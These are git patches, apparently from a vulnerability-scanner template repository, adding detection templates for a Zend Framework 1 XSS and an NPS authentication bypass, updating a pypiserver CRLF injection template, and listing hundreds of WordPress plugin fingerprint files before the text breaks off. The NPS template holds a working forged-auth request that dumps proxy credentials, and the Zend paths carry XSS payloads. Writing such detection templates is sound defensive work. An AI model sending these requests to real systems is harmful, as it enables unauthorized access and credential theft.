84a48a61ad8c213f2f5afc7f8243847dca037bad Mon Sep 17 00:00:00 2001 From: Celesian Date: Tue, 6 Dec 2022 05:13:46 -0300 Subject: [PATCH 0145/1133] added XSS for ZendFramework1 --- vulnerabilities/zend/zend-v1-xss.yaml | 39 +++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 vulnerabilities/zend/zend-v1-xss.yaml diff --git a/vulnerabilities/zend/zend-v1-xss.yaml b/vulnerabilities/zend/zend-v1-xss.yaml new file mode 100644 index 0000000000..788745b62a --- /dev/null +++ b/vulnerabilities/zend/zend-v1-xss.yaml @@ -0,0 +1,39 @@ +id: zend-v1-xss + +info: + name: ZendFramework 1.12.2 - Cross-Site Scripting + author: c3l3si4n + severity: medium + description: ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter. + reference: + - https://twitter.com/c3l3si4n/status/1600035722148212737 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + tags: zend,zendframework,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=%20a='{{randstr}}'>" + - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{randstr}}' + - ' Date: Tue, 6 Dec 2022 16:52:23 +0800 Subject: [PATCH 0146/1133] Added nps-auth-bypass --- vulnerabilities/nps/nps-auth-bypass.yaml | 35 ++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 vulnerabilities/nps/nps-auth-bypass.yaml diff --git a/vulnerabilities/nps/nps-auth-bypass.yaml b/vulnerabilities/nps/nps-auth-bypass.yaml new file mode 100644 index 0000000000..82ce8d4b82 --- /dev/null +++ b/vulnerabilities/nps/nps-auth-bypass.yaml @@ -0,0 +1,35 @@ +id: nps-auth-bypass + +info: + name: NPS Authentication Bypass + author: SleepingBag945 + severity: high + description: This will reveal all parameters configured on the NPS, including the account username and password of the proxy. + reference: + - https://mari0er.club/post/nps.html/ + tags: nps,auth-bypass + +requests: + - raw: + - | + POST /index/gettunnel HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + X-Requested-With: XMLHttpRequest + + auth_key={{md5(unix_time())}}×tamp={{unix_time()}}&offset=0&limit=10&type=socks5&client_id=&search= + + matchers-condition: and + matchers: + - type: word + words: + - "rows" + - "total" + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/12 From b04feae9ca29fe2cd21ff44c506605dd9e97953c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 14:31:05 +0530 Subject: [PATCH 0147/1133] Update zend-v1-xss.yaml --- vulnerabilities/zend/zend-v1-xss.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/zend/zend-v1-xss.yaml b/vulnerabilities/zend/zend-v1-xss.yaml index 788745b62a..1b31b2ec8f 100644 --- a/vulnerabilities/zend/zend-v1-xss.yaml +++ b/vulnerabilities/zend/zend-v1-xss.yaml @@ -36,4 +36,3 @@ requests: part: header words: - "text/html" - From d2cfcc32e917d54668e9f4e96293d3898b64e629 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 14:52:05 +0530 Subject: [PATCH 0148/1133] Update CVE-2019-6802.yaml --- CVE-2019-6802.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/CVE-2019-6802.yaml b/CVE-2019-6802.yaml index 15c993a74b..af9a49d03d 100644 --- a/CVE-2019-6802.yaml +++ b/CVE-2019-6802.yaml @@ -1,15 +1,19 @@ id: CVE-2019-6802 info: - name: CRLF Injection in pypiserver 1.2.5 + name: Pypiserver 1.2.5 - CRLF Injection author: 0x_Akoko severity: medium - description: CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI + description: | + CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI reference: - https://vuldb.com/?id.130257 - - https://www.cvedetails.com/cve/CVE-2019-6802/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-6802 classification: cve-id: CVE-2019-6802 + metadata: + verified: true + shodan-query: html:"pypiserver" tags: cve,cve2019,crlf,generic,pypiserver requests: From 6e65fef70133c63e804f3e979ed5c484ea5bedf0 Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Tue, 6 Dec 2022 06:28:42 -0300 Subject: [PATCH 0149/1133] Update wordpress plugin templates --- .../wordpress/wordpress-ad-inserter.txt | 1 + .../wordpress/wordpress-ad-inserter.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-add-to-any.txt | 1 + .../wordpress/wordpress-add-to-any.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-admin-menu-editor.txt | 1 + .../wordpress-admin-menu-editor.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-adminimize.txt | 1 + .../wordpress/wordpress-adminimize.yaml | 34 ++++++++++++++----- .../wordpress-advanced-custom-fields.txt | 1 + .../wordpress-advanced-custom-fields.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-akismet.txt | 1 + technologies/wordpress/wordpress-akismet.yaml | 34 ++++++++++++++----- ...wordpress-all-404-redirect-to-homepage.txt | 1 + ...ordpress-all-404-redirect-to-homepage.yaml | 34 ++++++++++++++----- .../wordpress-all-in-one-seo-pack.txt | 1 + .../wordpress-all-in-one-seo-pack.yaml | 34 ++++++++++++++----- .../wordpress-all-in-one-wp-migration.txt | 1 + .../wordpress-all-in-one-wp-migration.yaml | 34 ++++++++++++++----- ...ss-all-in-one-wp-security-and-firewall.txt | 1 + ...s-all-in-one-wp-security-and-firewall.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-amp.txt | 1 + technologies/wordpress/wordpress-amp.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-antispam-bee.txt | 1 + .../wordpress/wordpress-antispam-bee.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-astra-sites.txt | 1 + .../wordpress/wordpress-astra-sites.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-astra-widgets.txt | 1 + .../wordpress/wordpress-astra-widgets.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-autoptimize.txt | 1 + .../wordpress/wordpress-autoptimize.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-backwpup.txt | 1 + .../wordpress/wordpress-backwpup.yaml | 34 ++++++++++++++----- .../wordpress-better-search-replace.txt | 1 + .../wordpress-better-search-replace.yaml | 34 ++++++++++++++----- .../wordpress-better-wp-security.txt | 1 + .../wordpress-better-wp-security.yaml | 34 ++++++++++++++----- .../wordpress-black-studio-tinymce-widget.txt | 1 + ...wordpress-black-studio-tinymce-widget.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-breadcrumb-navxt.txt | 1 + .../wordpress/wordpress-breadcrumb-navxt.yaml | 34 ++++++++++++++----- .../wordpress-broken-link-checker.txt | 1 + .../wordpress-broken-link-checker.yaml | 34 ++++++++++++++----- .../wordpress-child-theme-configurator.txt | 1 + .../wordpress-child-theme-configurator.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-classic-editor.txt | 1 + .../wordpress/wordpress-classic-editor.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-classic-widgets.txt | 1 + .../wordpress/wordpress-classic-widgets.yaml | 34 ++++++++++++++----- .../wordpress-click-to-chat-for-whatsapp.txt | 1 + .../wordpress-click-to-chat-for-whatsapp.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-cloudflare.txt | 1 + .../wordpress/wordpress-cloudflare.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-cmb2.txt | 1 + technologies/wordpress/wordpress-cmb2.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-coblocks.txt | 1 + .../wordpress/wordpress-coblocks.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-code-snippets.txt | 1 + .../wordpress/wordpress-code-snippets.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-coming-soon.txt | 1 + .../wordpress/wordpress-coming-soon.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-complianz-gdpr.txt | 1 + .../wordpress/wordpress-complianz-gdpr.yaml | 34 ++++++++++++++----- .../wordpress-contact-form-7-honeypot.txt | 1 + .../wordpress-contact-form-7-honeypot.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-contact-form-7.txt | 1 + .../wordpress/wordpress-contact-form-7.yaml | 34 ++++++++++++++----- .../wordpress-contact-form-cfdb7.txt | 1 + .../wordpress-contact-form-cfdb7.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-cookie-law-info.txt | 1 + .../wordpress/wordpress-cookie-law-info.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-cookie-notice.txt | 1 + .../wordpress/wordpress-cookie-notice.yaml | 34 ++++++++++++++----- .../wordpress-creame-whatsapp-me.txt | 1 + .../wordpress-creame-whatsapp-me.yaml | 34 ++++++++++++++----- ...ress-creative-mail-by-constant-contact.txt | 1 + ...ess-creative-mail-by-constant-contact.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-custom-css-js.txt | 1 + .../wordpress/wordpress-custom-css-js.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-custom-fonts.txt | 1 + .../wordpress/wordpress-custom-fonts.yaml | 34 ++++++++++++++----- .../wordpress-custom-post-type-ui.txt | 1 + .../wordpress-custom-post-type-ui.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-disable-comments.txt | 1 + .../wordpress/wordpress-disable-comments.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-disable-gutenberg.txt | 1 + .../wordpress-disable-gutenberg.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-duplicate-page.txt | 1 + .../wordpress/wordpress-duplicate-page.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-duplicate-post.txt | 1 + .../wordpress/wordpress-duplicate-post.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-duplicator.txt | 1 + .../wordpress/wordpress-duplicator.yaml | 34 ++++++++++++++----- ...dpress-duracelltomi-google-tag-manager.txt | 1 + ...press-duracelltomi-google-tag-manager.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-easy-fancybox.txt | 1 + .../wordpress/wordpress-easy-fancybox.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-easy-google-fonts.txt | 1 + .../wordpress-easy-google-fonts.yaml | 34 ++++++++++++++----- .../wordpress-easy-table-of-contents.txt | 1 + .../wordpress-easy-table-of-contents.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-easy-wp-smtp.txt | 1 + .../wordpress/wordpress-easy-wp-smtp.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-elementor.txt | 1 + .../wordpress/wordpress-elementor.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-elementskit-lite.txt | 1 + .../wordpress/wordpress-elementskit-lite.yaml | 34 ++++++++++++++----- .../wordpress-enable-media-replace.txt | 1 + .../wordpress-enable-media-replace.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-envato-elements.txt | 1 + .../wordpress/wordpress-envato-elements.yaml | 34 ++++++++++++++----- ...ss-essential-addons-for-elementor-lite.txt | 1 + ...s-essential-addons-for-elementor-lite.yaml | 34 ++++++++++++++----- .../wordpress-ewww-image-optimizer.txt | 1 + .../wordpress-ewww-image-optimizer.yaml | 34 ++++++++++++++----- .../wordpress-facebook-for-woocommerce.txt | 1 + .../wordpress-facebook-for-woocommerce.yaml | 34 ++++++++++++++----- ...dpress-favicon-by-realfavicongenerator.txt | 1 + ...press-favicon-by-realfavicongenerator.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-flamingo.txt | 1 + .../wordpress/wordpress-flamingo.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-fluentform.txt | 1 + .../wordpress/wordpress-fluentform.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-font-awesome.txt | 1 + .../wordpress/wordpress-font-awesome.yaml | 34 ++++++++++++++----- .../wordpress-force-regenerate-thumbnails.txt | 1 + ...wordpress-force-regenerate-thumbnails.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-formidable.txt | 1 + .../wordpress/wordpress-formidable.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-forminator.txt | 1 + .../wordpress/wordpress-forminator.yaml | 34 ++++++++++++++----- .../wordpress-ga-google-analytics.txt | 1 + .../wordpress-ga-google-analytics.yaml | 34 ++++++++++++++----- ...ress-google-analytics-dashboard-for-wp.txt | 1 + ...ess-google-analytics-dashboard-for-wp.yaml | 34 ++++++++++++++----- ...rdpress-google-analytics-for-wordpress.txt | 1 + ...dpress-google-analytics-for-wordpress.yaml | 34 ++++++++++++++----- .../wordpress-google-listings-and-ads.txt | 1 + .../wordpress-google-listings-and-ads.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-google-site-kit.txt | 1 + .../wordpress/wordpress-google-site-kit.yaml | 34 ++++++++++++++----- .../wordpress-google-sitemap-generator.txt | 1 + .../wordpress-google-sitemap-generator.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-gtranslate.txt | 1 + .../wordpress/wordpress-gtranslate.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-gutenberg.txt | 1 + .../wordpress/wordpress-gutenberg.yaml | 34 ++++++++++++++----- .../wordpress-happy-elementor-addons.txt | 1 + .../wordpress-happy-elementor-addons.yaml | 34 ++++++++++++++----- .../wordpress-header-and-footer-scripts.txt | 1 + .../wordpress-header-and-footer-scripts.yaml | 34 ++++++++++++++----- .../wordpress-header-footer-code-manager.txt | 1 + .../wordpress-header-footer-code-manager.yaml | 34 ++++++++++++++----- .../wordpress-header-footer-elementor.txt | 1 + .../wordpress-header-footer-elementor.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-header-footer.txt | 1 + .../wordpress/wordpress-header-footer.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-health-check.txt | 1 + .../wordpress/wordpress-health-check.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-hello-dolly.txt | 1 + .../wordpress/wordpress-hello-dolly.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-imagify.txt | 1 + technologies/wordpress/wordpress-imagify.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-imsanity.txt | 1 + .../wordpress/wordpress-imsanity.yaml | 34 ++++++++++++++----- .../wordpress-insert-headers-and-footers.txt | 1 + .../wordpress-insert-headers-and-footers.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-instagram-feed.txt | 1 + .../wordpress/wordpress-instagram-feed.yaml | 34 ++++++++++++++----- .../wordpress-intuitive-custom-post-order.txt | 1 + ...wordpress-intuitive-custom-post-order.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-iwp-client.txt | 1 + .../wordpress/wordpress-iwp-client.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-jetpack.txt | 1 + technologies/wordpress/wordpress-jetpack.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-kadence-blocks.txt | 1 + .../wordpress/wordpress-kadence-blocks.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-kirki.txt | 1 + technologies/wordpress/wordpress-kirki.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-leadin.txt | 1 + technologies/wordpress/wordpress-leadin.yaml | 34 ++++++++++++++----- ...ordpress-limit-login-attempts-reloaded.txt | 1 + ...rdpress-limit-login-attempts-reloaded.yaml | 34 ++++++++++++++----- .../wordpress-limit-login-attempts.txt | 1 + .../wordpress-limit-login-attempts.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-litespeed-cache.txt | 1 + .../wordpress/wordpress-litespeed-cache.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-loco-translate.txt | 1 + .../wordpress/wordpress-loco-translate.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-loginizer.txt | 1 + .../wordpress/wordpress-loginizer.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-loginpress.txt | 1 + .../wordpress/wordpress-loginpress.yaml | 34 ++++++++++++++----- .../wordpress-mailchimp-for-woocommerce.txt | 1 + .../wordpress-mailchimp-for-woocommerce.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-mailchimp-for-wp.txt | 1 + .../wordpress/wordpress-mailchimp-for-wp.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-mailpoet.txt | 1 + .../wordpress/wordpress-mailpoet.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-maintenance.txt | 1 + .../wordpress/wordpress-maintenance.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-mainwp-child.txt | 1 + .../wordpress/wordpress-mainwp-child.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-malcare-security.txt | 1 + .../wordpress/wordpress-malcare-security.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-megamenu.txt | 1 + .../wordpress/wordpress-megamenu.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-members.txt | 1 + technologies/wordpress/wordpress-members.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-meta-box.txt | 1 + .../wordpress/wordpress-meta-box.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-ml-slider.txt | 1 + .../wordpress/wordpress-ml-slider.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-newsletter.txt | 1 + .../wordpress/wordpress-newsletter.yaml | 34 ++++++++++++++----- .../wordpress-nextend-facebook-connect.txt | 1 + .../wordpress-nextend-facebook-connect.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-nextgen-gallery.txt | 1 + .../wordpress/wordpress-nextgen-gallery.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-ninja-forms.txt | 1 + .../wordpress/wordpress-ninja-forms.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-ocean-extra.txt | 1 + .../wordpress/wordpress-ocean-extra.yaml | 34 ++++++++++++++----- .../wordpress-official-facebook-pixel.txt | 1 + .../wordpress-official-facebook-pixel.yaml | 34 ++++++++++++++----- .../wordpress-one-click-demo-import.txt | 1 + .../wordpress-one-click-demo-import.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-optinmonster.txt | 1 + .../wordpress/wordpress-optinmonster.yaml | 34 ++++++++++++++----- .../wordpress-password-protected.txt | 1 + .../wordpress-password-protected.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-pdf-embedder.txt | 1 + .../wordpress/wordpress-pdf-embedder.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-photo-gallery.txt | 1 + .../wordpress/wordpress-photo-gallery.yaml | 34 ++++++++++++++----- .../wordpress-php-compatibility-checker.txt | 1 + .../wordpress-php-compatibility-checker.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-pixelyoursite.txt | 1 + .../wordpress/wordpress-pixelyoursite.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-polylang.txt | 1 + .../wordpress/wordpress-polylang.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-popup-builder.txt | 1 + .../wordpress/wordpress-popup-builder.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-popup-maker.txt | 1 + .../wordpress/wordpress-popup-maker.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-post-duplicator.txt | 1 + .../wordpress/wordpress-post-duplicator.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-post-smtp.txt | 1 + .../wordpress/wordpress-post-smtp.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-post-types-order.txt | 1 + .../wordpress/wordpress-post-types-order.yaml | 34 ++++++++++++++----- ...wordpress-premium-addons-for-elementor.txt | 1 + ...ordpress-premium-addons-for-elementor.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-pretty-link.txt | 1 + .../wordpress/wordpress-pretty-link.yaml | 34 ++++++++++++++----- .../wordpress-really-simple-captcha.txt | 1 + .../wordpress-really-simple-captcha.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-really-simple-ssl.txt | 1 + .../wordpress-really-simple-ssl.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-redirection.txt | 1 + .../wordpress/wordpress-redirection.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-redux-framework.txt | 1 + .../wordpress/wordpress-redux-framework.yaml | 34 ++++++++++++++----- .../wordpress-regenerate-thumbnails.txt | 1 + .../wordpress-regenerate-thumbnails.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-safe-svg.txt | 1 + .../wordpress/wordpress-safe-svg.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-seo-by-rank-math.txt | 1 + .../wordpress/wordpress-seo-by-rank-math.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-sg-cachepress.txt | 1 + .../wordpress/wordpress-sg-cachepress.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-sg-security.txt | 1 + .../wordpress/wordpress-sg-security.yaml | 34 ++++++++++++++----- .../wordpress-shortcodes-ultimate.txt | 1 + .../wordpress-shortcodes-ultimate.yaml | 34 ++++++++++++++----- .../wordpress-shortpixel-image-optimiser.txt | 1 + .../wordpress-shortpixel-image-optimiser.yaml | 34 ++++++++++++++----- .../wordpress-simple-custom-post-order.txt | 1 + .../wordpress-simple-custom-post-order.yaml | 34 ++++++++++++++----- .../wordpress-simple-page-ordering.txt | 1 + .../wordpress-simple-page-ordering.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-siteguard.txt | 1 + .../wordpress/wordpress-siteguard.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-siteorigin-panels.txt | 1 + .../wordpress-siteorigin-panels.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-smart-slider-3.txt | 1 + .../wordpress/wordpress-smart-slider-3.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-so-widgets-bundle.txt | 1 + .../wordpress-so-widgets-bundle.yaml | 34 ++++++++++++++----- .../wordpress-ssl-insecure-content-fixer.txt | 1 + .../wordpress-ssl-insecure-content-fixer.yaml | 34 ++++++++++++++----- ...ss-stops-core-theme-and-plugin-updates.txt | 1 + ...s-stops-core-theme-and-plugin-updates.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-sucuri-scanner.txt | 1 + .../wordpress/wordpress-sucuri-scanner.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-svg-support.txt | 1 + .../wordpress/wordpress-svg-support.yaml | 34 ++++++++++++++----- .../wordpress-table-of-contents-plus.txt | 1 + .../wordpress-table-of-contents-plus.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-tablepress.txt | 1 + .../wordpress/wordpress-tablepress.yaml | 34 ++++++++++++++----- .../wordpress-taxonomy-terms-order.txt | 1 + .../wordpress-taxonomy-terms-order.yaml | 34 ++++++++++++++----- .../wordpress-the-events-calendar.txt | 1 + .../wordpress-the-events-calendar.yaml | 34 ++++++++++++++----- .../wordpress-themeisle-companion.txt | 1 + .../wordpress-themeisle-companion.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-tinymce-advanced.txt | 1 + .../wordpress/wordpress-tinymce-advanced.yaml | 34 ++++++++++++++----- .../wordpress-translatepress-multilingual.txt | 1 + ...wordpress-translatepress-multilingual.yaml | 34 ++++++++++++++----- ...ordpress-ultimate-addons-for-gutenberg.txt | 1 + ...rdpress-ultimate-addons-for-gutenberg.yaml | 34 ++++++++++++++----- .../wordpress-under-construction-page.txt | 1 + .../wordpress-under-construction-page.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-unyson.txt | 1 + technologies/wordpress/wordpress-unyson.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-updraftplus.txt | 1 + .../wordpress/wordpress-updraftplus.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-use-any-font.txt | 1 + .../wordpress/wordpress-use-any-font.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-user-role-editor.txt | 1 + .../wordpress/wordpress-user-role-editor.yaml | 34 ++++++++++++++----- .../wordpress-velvet-blues-update-urls.txt | 1 + .../wordpress-velvet-blues-update-urls.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-w3-total-cache.txt | 1 + .../wordpress/wordpress-w3-total-cache.yaml | 34 ++++++++++++++----- .../wordpress-widget-importer-exporter.txt | 1 + .../wordpress-widget-importer-exporter.yaml | 34 ++++++++++++++----- ...ordpress-woo-cart-abandonment-recovery.txt | 1 + ...rdpress-woo-cart-abandonment-recovery.yaml | 34 ++++++++++++++----- ...ordpress-woo-checkout-field-editor-pro.txt | 1 + ...rdpress-woo-checkout-field-editor-pro.yaml | 34 ++++++++++++++----- .../wordpress-woo-variation-swatches.txt | 1 + .../wordpress-woo-variation-swatches.yaml | 34 ++++++++++++++----- ...mmerce-gateway-paypal-express-checkout.txt | 1 + ...merce-gateway-paypal-express-checkout.yaml | 34 ++++++++++++++----- .../wordpress-woocommerce-gateway-stripe.txt | 1 + .../wordpress-woocommerce-gateway-stripe.yaml | 34 ++++++++++++++----- .../wordpress-woocommerce-payments.txt | 1 + .../wordpress-woocommerce-payments.yaml | 34 ++++++++++++++----- .../wordpress-woocommerce-paypal-payments.txt | 1 + ...wordpress-woocommerce-paypal-payments.yaml | 34 ++++++++++++++----- ...woocommerce-pdf-invoices-packing-slips.txt | 1 + ...oocommerce-pdf-invoices-packing-slips.yaml | 34 ++++++++++++++----- .../wordpress-woocommerce-services.txt | 1 + .../wordpress-woocommerce-services.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-woocommerce.txt | 1 + .../wordpress/wordpress-woocommerce.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-woosidebars.txt | 1 + .../wordpress/wordpress-woosidebars.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wordfence.txt | 1 + .../wordpress/wordpress-wordfence.yaml | 34 ++++++++++++++----- .../wordpress-wordpress-importer.txt | 1 + .../wordpress-wordpress-importer.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wordpress-seo.txt | 1 + .../wordpress/wordpress-wordpress-seo.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-worker.txt | 1 + technologies/wordpress/wordpress-worker.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wp-fastest-cache.txt | 1 + .../wordpress/wordpress-wp-fastest-cache.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wp-file-manager.txt | 1 + .../wordpress/wordpress-wp-file-manager.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wp-google-maps.txt | 1 + .../wordpress/wordpress-wp-google-maps.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wp-mail-smtp.txt | 1 + .../wordpress/wordpress-wp-mail-smtp.yaml | 34 ++++++++++++++----- .../wordpress-wp-maintenance-mode.txt | 1 + .../wordpress-wp-maintenance-mode.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wp-migrate-db.txt | 1 + .../wordpress/wordpress-wp-migrate-db.yaml | 34 ++++++++++++++----- .../wordpress-wp-multibyte-patch.txt | 1 + .../wordpress-wp-multibyte-patch.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wp-optimize.txt | 1 + .../wordpress/wordpress-wp-optimize.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wp-pagenavi.txt | 1 + .../wordpress/wordpress-wp-pagenavi.yaml | 34 ++++++++++++++----- technologies/wordpress/wordpress-wp-reset.txt | 1 + .../wordpress/wordpress-wp-reset.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wp-sitemap-page.txt | 1 + .../wordpress/wordpress-wp-sitemap-page.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wp-smushit.txt | 1 + .../wordpress/wordpress-wp-smushit.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wp-statistics.txt | 1 + .../wordpress/wordpress-wp-statistics.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wp-super-cache.txt | 1 + .../wordpress/wordpress-wp-super-cache.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wp-user-avatar.txt | 1 + .../wordpress/wordpress-wp-user-avatar.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wpcf7-recaptcha.txt | 1 + .../wordpress/wordpress-wpcf7-recaptcha.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wpcf7-redirect.txt | 1 + .../wordpress/wordpress-wpcf7-redirect.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wpforms-lite.txt | 1 + .../wordpress/wordpress-wpforms-lite.yaml | 34 ++++++++++++++----- .../wordpress/wordpress-wps-hide-login.txt | 1 + .../wordpress/wordpress-wps-hide-login.yaml | 34 ++++++++++++++----- .../wordpress-yith-woocommerce-compare.txt | 1 + .../wordpress-yith-woocommerce-compare.yaml | 34 ++++++++++++++----- .../wordpress-yith-woocommerce-wishlist.txt | 1 + .../wordpress-yith-woocommerce-wishlist.yaml | 34 ++++++++++++++----- 400 files changed, 5200 insertions(+), 1800 deletions(-) create mode 100644 technologies/wordpress/wordpress-ad-inserter.txt create mode 100644 technologies/wordpress/wordpress-add-to-any.txt create mode 100644 technologies/wordpress/wordpress-admin-menu-editor.txt create mode 100644 technologies/wordpress/wordpress-adminimize.txt create mode 100644 technologies/wordpress/wordpress-advanced-custom-fields.txt create mode 100644 technologies/wordpress/wordpress-akismet.txt create mode 100644 technologies/wordpress/wordpress-all-404-redirect-to-homepage.txt create mode 100644 technologies/wordpress/wordpress-all-in-one-seo-pack.txt create mode 100644 technologies/wordpress/wordpress-all-in-one-wp-migration.txt create mode 100644 